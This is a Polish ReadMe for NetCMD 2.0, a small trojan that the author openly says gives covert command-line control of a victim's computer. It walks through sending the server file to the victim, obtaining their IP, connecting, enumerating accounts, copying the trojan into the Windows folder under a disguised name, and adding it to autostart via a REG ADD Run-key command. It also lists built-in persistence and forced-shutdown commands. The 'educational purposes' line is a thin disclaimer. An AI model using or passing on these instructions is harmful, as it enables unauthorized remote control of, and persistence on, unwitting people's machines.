Witaj w pliku ReadMe programu NetCMD V 2.0.
Autor: Amidamaru.
Oczekuje wszelakich komentarzy, uwag i propozycji! Mój mail:
[email protected]
PROGRAM STWORZONY DO CELÓW EDUKACYJNYCH.
1. O plikach
__________________________________________________ __________________________________________________ ________
Program jest bardzo prostym programem do zdalnego zarządzania komputerem, bez świadomości drugiej strony - czyli poprostu trojanem :)
NIEOTWIERAJ PLIKU srv.exe ! Jest to plik dla ofiary!
Plik cli.exe natomiast służy do zdalnego sterowania.
Największą zaletą programu jest pojemność:
- plik srv.exe ma 8,5 kb [bez frameworka!]
- plik cli.exe ma też 8,5 kb [bez frameworka!]
Po spakowaniu razem mają 12,9 kb. [bez frameworka!]
Przede wszystkim uzyskano taki wynik poprzez:
- Spakowanie pliku srv.ex oraz cli.exe programem UPX w najlepszej możliwej kompresji
- Spakowanie obu plików do archiwum RAR-a (pliki_dla_komputerow_z_frameworkiem.rar) o najwyższym stopniu kompresji
Po dokładnym przeczytaniu pliku ReadMe.txt (czyli tego) i doshelp.txt możesz posługiwać się samym archiwum pliki_dla_komputerow_z_frameworkiem.rar lub pliki_dla_komputerow_bez_frameworka.rar.
W wersji 2.0 znajdziesz dodatkowo archiwum pliki_dla_komputerow_bez_frameworka.rar , w którym znajdują się pliki także spakowane UPX-em o najwyższej kompresji. Jednak mają one po ok. 150 kb ze względu na to, że dźwigają frameworka.
Jeżeli więc nie jesteś pewien co do obecnoście frameworka na komputerze swoim lub ofiary to używaj archiwum pliki_dla_komputerow_bez_frameworka.rar !
Jak sprawdziś czy masz frameworka? Jeżeli przy uruchomieniu cli.exe lub srv.exe zobaczysz komunikat: "Uruchomienie tej aplikacji nie powiodło się, ponieważ nie znaleziono rtl70.bpl. Ponowne zainstalowanie..." lub "Uruchomienie tej aplikacji nie powiodło się, ponieważ nie znaleziono vcl70.bpl. Ponowne zainstalowanie..." lub podobny oznacza to, iż nie masz frameworka.
Pamiętaj! Nie masz pewności czy Ty i ofiara macie frameworka? Używaj zawsze plików z archiwum pliki_dla_komputerow_bez_frameworka.rar!
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
2. Zaczynamy!
__________________________________________________ __________________________________________________ ________
Program nie wymaga żadnej konfiguracji. Działa na stałym porcie i ma jednolitne ustawienia.
Aby więc zacząć musisz tylko podesłać ofiarze plik srv.exe i poznać jej IP (np. poprzez Gadu-Gadu).
Następnie odpalasz u siebie plik cli.exe. W pole IP: wpisujesz oczywiście IP ofiary i klikasz Enter.
Czekasz na połączenie.
Gdy zostaniesz połączony możesz już wykonywać zdalnie komendy na komputerze ofiary!
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
3. Podstawy
__________________________________________________ __________________________________________________ ________
Od razu powiem, że program nie jest dla lamerów, którzy uważają się za wielkich haksi0rów :/ Nie ma tu żadnych fajnych zabaweczek. Czysta linia komend. Jednak bardziej doświadczeni zapewne wiedzą, że przez CMD można zrobić praktycznie WSZYSTKO!
Moja propozycja jak zacząć wygląda tak:
a) wpisjemy systeminfo, aby zobaczyć co w kompie gra
b) wpisujemy net user, a potem net user Administrator, aby zorientować się jakie posiada konta oraz czy Administrator ma hasło i czy można je zmienić
c) teraz proste copy "ścieżka_trojana" "C:\Windows\jakas_fajna_nazwa.exe", żeby skopiować naszego trojanika do folderu Windowsa
d) czas dodać trojana do autostartu. Uzyskamy to za pomocą edytora rejestru pod CMD, wpisujemy: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NazwaWAutostarcie /t REG_SZ /d C:\Windows\NazwaPodJakaSkopiowalismyTrojana.exe . Od wersji 2.0 wystarczy też wpisać samo "/netcmd:autostart".
Po tych czynnościach jesteśmy niejako "zabezpieczeni" i możemy kontynuować...
Proszę przed wyłączeniem programu wpisać w linię komen ofiary polecenie exit lub /netcmd:exit !! (Inaczej proces CMD.EXE nie zostanie zakończony)
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
4. Polecenia wbudowane
__________________________________________________ __________________________________________________ ________
Program NetCMD od wersji 2.0 posiada wbudowane opcje, które wpisujemy jako normalna komenda. Ułatwiają one lub umożliwiają niektóre funkcje. Oto ich lista:
/netcmd:autostart - dodaje NetCMD do autostaru (serwer NetCMD będzie się uruchamiał z każdym uruchomieniem komputera ofiary) - wykonuje polecenie "REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ShellExt /t REG_SZ /d srv.exe"
/netcmd:exit - wpisuje exit w linię komend ofiary, zabija proces CMD.EXE na komputerze ofiary i wyłacza u niego serwer. Zawsze warto wykonać go dla bezpieczeństwa gdy chcemy się rozłączyć. Ta opcja automatycznie nas rozłączy błędem (jednak serwer wyłączy się poprawnie).
/netcmd:disconnect - dezaktywuje serwer i rozłącza go.
/netcmd:shutdown - zamyka komputer ofiary. Wykonuje polecenie "shutdown -s -t 1 -f".
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
5. Postanowienia końcowe
__________________________________________________ __________________________________________________ ________
Pamiętaj, że mogę być problemy z połączeniem jeżeli ofiara:
- znajduje się za NAT-em
- posiada firewall (nawet czasem Windowsowy blokuje)
- posiada antywirua z bardzo wysokim stopniem filtracji (może wykryć, że program był kompresowany, co czasami zostaje uznane za wirusa)
Pamiętaj: używasz programu na własną odpowiedzialność
Autor: AMIDAMARU.
Licencja: freeware.
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
LOGO
NetCMD
wersja 2.0
By Amidamaru